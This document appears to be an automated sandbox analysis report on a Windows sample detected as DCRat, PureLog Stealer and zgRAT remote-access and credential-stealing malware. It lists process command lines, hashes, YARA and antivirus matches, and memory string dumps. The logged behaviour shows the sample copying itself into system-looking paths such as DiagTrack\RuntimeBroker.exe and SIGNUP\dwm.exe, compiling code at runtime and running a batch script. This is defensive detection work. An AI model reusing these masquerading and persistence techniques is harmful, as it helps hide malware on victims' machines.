                                                                    Data Raw: 09 1d 26 54 3d 25 26 5b 26 3b 28 1b 30 0d 2a 1f 2a 3d 2f 5e 29 2e 2d 5f 24 06 0f 14 32 3e 2c 1d 24 15 21 10 2b 2e 26 19 26 3c 2f 10 2d 24 2b 5d 0c 13 22 58 20 2a 31 01 25 3c 34 5b 2b 28 3f 5a 36 05 36 59 28 04 26 0c 3f 2f 0a 13 28 39 05 58 2a 2a 03 0f 2f 16 36 05 39 33 36 1d 20 3e 2b 52 0d 11 24 1f 3c 3d 0c 0d 3e 10 16 00 22 28 0e 07 30 03 31 0d 26 32 29 0c 27 5f 23 03 26 0c 1b 56 27 31 07 57 31 02 2a 1c 25 59 25 1c 21 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &T=%&[&;(0**=/^).-_$2>,$!+.&&</-$+]"X *1%<4[+(?Z66Y(&?/(9X**/6936 >+R$<=>"(01&2)'_#&V'1W1*%Y%!#T,"W3UV



                                                                    Target ID:0
                                                                    Start time:04:02:47
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0x630000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:04:02:49
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                                                                    Imagebase:0x7ff78ce80000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:04:02:49
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP"
                                                                    Imagebase:0x7ff7db0b0000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                                                                    Imagebase:0x7ff78ce80000
                                                                    File size:2'759'232 bytes
                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:04:02:50
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:04:02:51
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP"
                                                                    Imagebase:0x7ff7db0b0000
                                                                    File size:52'744 bytes
                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                                                                    Imagebase:0x7ff6638f0000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff782d50000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:04:02:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                    Imagebase:0x7ff7efa10000
                                                                    File size:108'032 bytes
                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:04:02:58
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0x300000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:24
                                                                    Start time:04:03:00
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xf0000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:04:03:09
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0x320000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:05:58:02
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0xe10000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 74%, ReversingLabs
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:05:58:11
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xb10000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:32
                                                                    Start time:05:58:19
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xb50000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:05:58:27
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0xe60000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:36
                                                                    Start time:05:58:36
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0xbc0000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:37
                                                                    Start time:05:58:44
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xf50000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:38
                                                                    Start time:05:58:52
                                                                    Start date:21/08/2024
                                                                    Path:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                                    Imagebase:0xa00000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:39
                                                                    Start time:05:59:00
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                                    Imagebase:0x320000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:40
                                                                    Start time:05:59:08
                                                                    Start date:21/08/2024
                                                                    Path:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                                    Imagebase:0x450000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:41
                                                                    Start time:05:59:16
                                                                    Start date:21/08/2024
                                                                    Path:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                                    Imagebase:0xb80000
                                                                    File size:1'960'448 bytes
                                                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true


                                                                      Execution Graph

                                                                      Execution Coverage:9.6%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:3
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 8441 7ffaad0dde01 8443 7ffaad0dde1f QueryFullProcessImageNameA 8441->8443 8444 7ffaad0ddfc4 8443->8444

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "9$5X_H$b4$r6$r6
                                                                      • API String ID: 0-3501087565
                                                                      • Opcode ID: 5cf72a81b3814e74755476172e8df64c9b1d57c9ba90fd7bac87a141e5f80cee
                                                                      • Instruction ID: 3af66b9a1849358e5d310813852738c903bc19dfdd2d081a43e49fbff938dabd
                                                                      • Opcode Fuzzy Hash: 5cf72a81b3814e74755476172e8df64c9b1d57c9ba90fd7bac87a141e5f80cee
                                                                      • Instruction Fuzzy Hash: 0591E2B1918A898FF789DB68C86A7A9BFE1FF56310F4101BAC04DD73D2CB7858158781

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: b4$r6$r6
                                                                      • API String ID: 0-3183416175
                                                                      • Opcode ID: ae78423efa29a6e557dc877cbf0431bc49d17985597cc483fd40b6b68a165a14
                                                                      • Instruction ID: 1638bc3dee9db1b123ea27cf8324b73a0845f50149995705cb929a04b8a49332
                                                                      • Opcode Fuzzy Hash: ae78423efa29a6e557dc877cbf0431bc49d17985597cc483fd40b6b68a165a14
                                                                      • Instruction Fuzzy Hash: 7851B4B2A18A499EF388CF58C85A7A9BFE1EF9A314F4005BEC00DD37D1CB7958158781

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X
                                                                      • API String ID: 0-3240521626
                                                                      • Opcode ID: 04af20d6f483a1cd1485e0d9e4ee00968376525463335f7e11a533394acb79f7
                                                                      • Instruction ID: b06466b6fe1b842bb52e6153d23c9782207a53b20894d3fc91b9acd9b8519348
                                                                      • Opcode Fuzzy Hash: 04af20d6f483a1cd1485e0d9e4ee00968376525463335f7e11a533394acb79f7
                                                                      • Instruction Fuzzy Hash: 1B02C470A19A498FE788EB68C4566B877D2FF9A304F15417BD09FC3282DD28AC4987C1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID: FullImageNameProcessQuery
                                                                      • String ID:
                                                                      • API String ID: 3578328331-0
                                                                      • Opcode ID: 5fddd3926eb0dbea21766c77b74c72d554075d06ffc57ad2c2af02df7c2fae3a
                                                                      • Instruction ID: a8471759adc044d0f3f5478ddecbd3964ca3db290c077ffcd6ba42d288f0d186
                                                                      • Opcode Fuzzy Hash: 5fddd3926eb0dbea21766c77b74c72d554075d06ffc57ad2c2af02df7c2fae3a
                                                                      • Instruction Fuzzy Hash: 1891A270509A8C8FDB68DF18D84A7F937D1FB59315F00812FE88EC7292DA75A8558B81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302862281.00007FFAAD0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAD0D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaad0d0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X
                                                                      • API String ID: 0-3240521626
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1299816717.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffaacce0000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab440000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: b43$r63$r63$r63
                                                                      • API String ID: 0-2169701798
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: fe14171689ba1c34e93771c3cd4cca477db38d3fa10d9e1b050f63d38190c0c7
                                                                      • Instruction ID: b4a25277f120321be561f87954bde29ef8049fb884c282553363e94268f034b6
                                                                      • Opcode Fuzzy Hash: fe14171689ba1c34e93771c3cd4cca477db38d3fa10d9e1b050f63d38190c0c7
                                                                      • Instruction Fuzzy Hash: 99C1BC62A2D6964BE31D4B284C860B577D6EBD3241B18C67DD8DFC7097F928E84BC2C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$r63$r63$r63
                                                                      • API String ID: 0-3582378960
                                                                      • Opcode ID: 794235a04cf9a6d729d6adb3665c6bf83aede096daf19294b77064811d49c4ea
                                                                      • Instruction ID: 6ea46a045e3ee2d8a06eb8f245a84e51ec0fef11852ec7f7bc19ad65fc21918d
                                                                      • Opcode Fuzzy Hash: 794235a04cf9a6d729d6adb3665c6bf83aede096daf19294b77064811d49c4ea
                                                                      • Instruction Fuzzy Hash: CCB1C27090EA469FE749DB28C0916A4B7A1FF5A300F5491BDD04EC7AD6DB28F855CBC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5K_H$r63$r63$r63
                                                                      • API String ID: 0-3436917211
                                                                      • Opcode ID: 993c63de3edd65ffd8c2f314ce5cd5096f064faec89ff2dc63bc4a30a3755ddf
                                                                      • Instruction ID: 68194b57e98f53e4f5533c10a8aa837bd6d6b6b71bcd8c593346c1aaecb9f9bf
                                                                      • Opcode Fuzzy Hash: 993c63de3edd65ffd8c2f314ce5cd5096f064faec89ff2dc63bc4a30a3755ddf
                                                                      • Instruction Fuzzy Hash: 38811571A1DAC98FDB85DB68C8651BD7BE1EF9A340F0481BAD04DD32A2CA245C45C792
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (06$(06$r63
                                                                      • API String ID: 0-3866029006
                                                                      • Opcode ID: 6d7728d7ef71091f5b1822b6bb22f8eb2943879d0139857cf2371310a585f32e
                                                                      • Instruction ID: 71e111b841e65eaf38a81f10ae97bf76cc0647ee961dd6963dfd4ec056acea72
                                                                      • Opcode Fuzzy Hash: 6d7728d7ef71091f5b1822b6bb22f8eb2943879d0139857cf2371310a585f32e
                                                                      • Instruction Fuzzy Hash: 30E16922A0DE4A8FE798DB2CD495AB537D1EFA935070442BAC04EC71A7DD18EC89C3C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U$b43$r63
                                                                      • API String ID: 0-2976439527
                                                                      • Opcode ID: babe24880be813681b8745d1f30cd815b50292f563fb1aadb4bce9039c0e12ac
                                                                      • Instruction ID: e9a1f16e9ecd143d217ba2904ac10b6d539f8de00d4541e533f8d4579a686ddd
                                                                      • Opcode Fuzzy Hash: babe24880be813681b8745d1f30cd815b50292f563fb1aadb4bce9039c0e12ac
                                                                      • Instruction Fuzzy Hash: B9F19D74919656CFEB58DF18C4D06B43BA1FF59300F5485FDC84E8B69ACA38B885CB81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63$r63
                                                                      • API String ID: 0-1480572877
                                                                      • Opcode ID: 9ee0be43610e2d969e19dc760bd49b72a385e295d1d6c4bbdae1143386d8edfa
                                                                      • Instruction ID: 8bc6542b40301fd42ed5400bb96059968fd5833fe7ab57de0de4c2330148026f
                                                                      • Opcode Fuzzy Hash: 9ee0be43610e2d969e19dc760bd49b72a385e295d1d6c4bbdae1143386d8edfa
                                                                      • Instruction Fuzzy Hash: 6AB1D230A0AA46CFE749DB28C0906B4B7A1FF59341F5485BDD04EC7AD6DB28B856CBD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
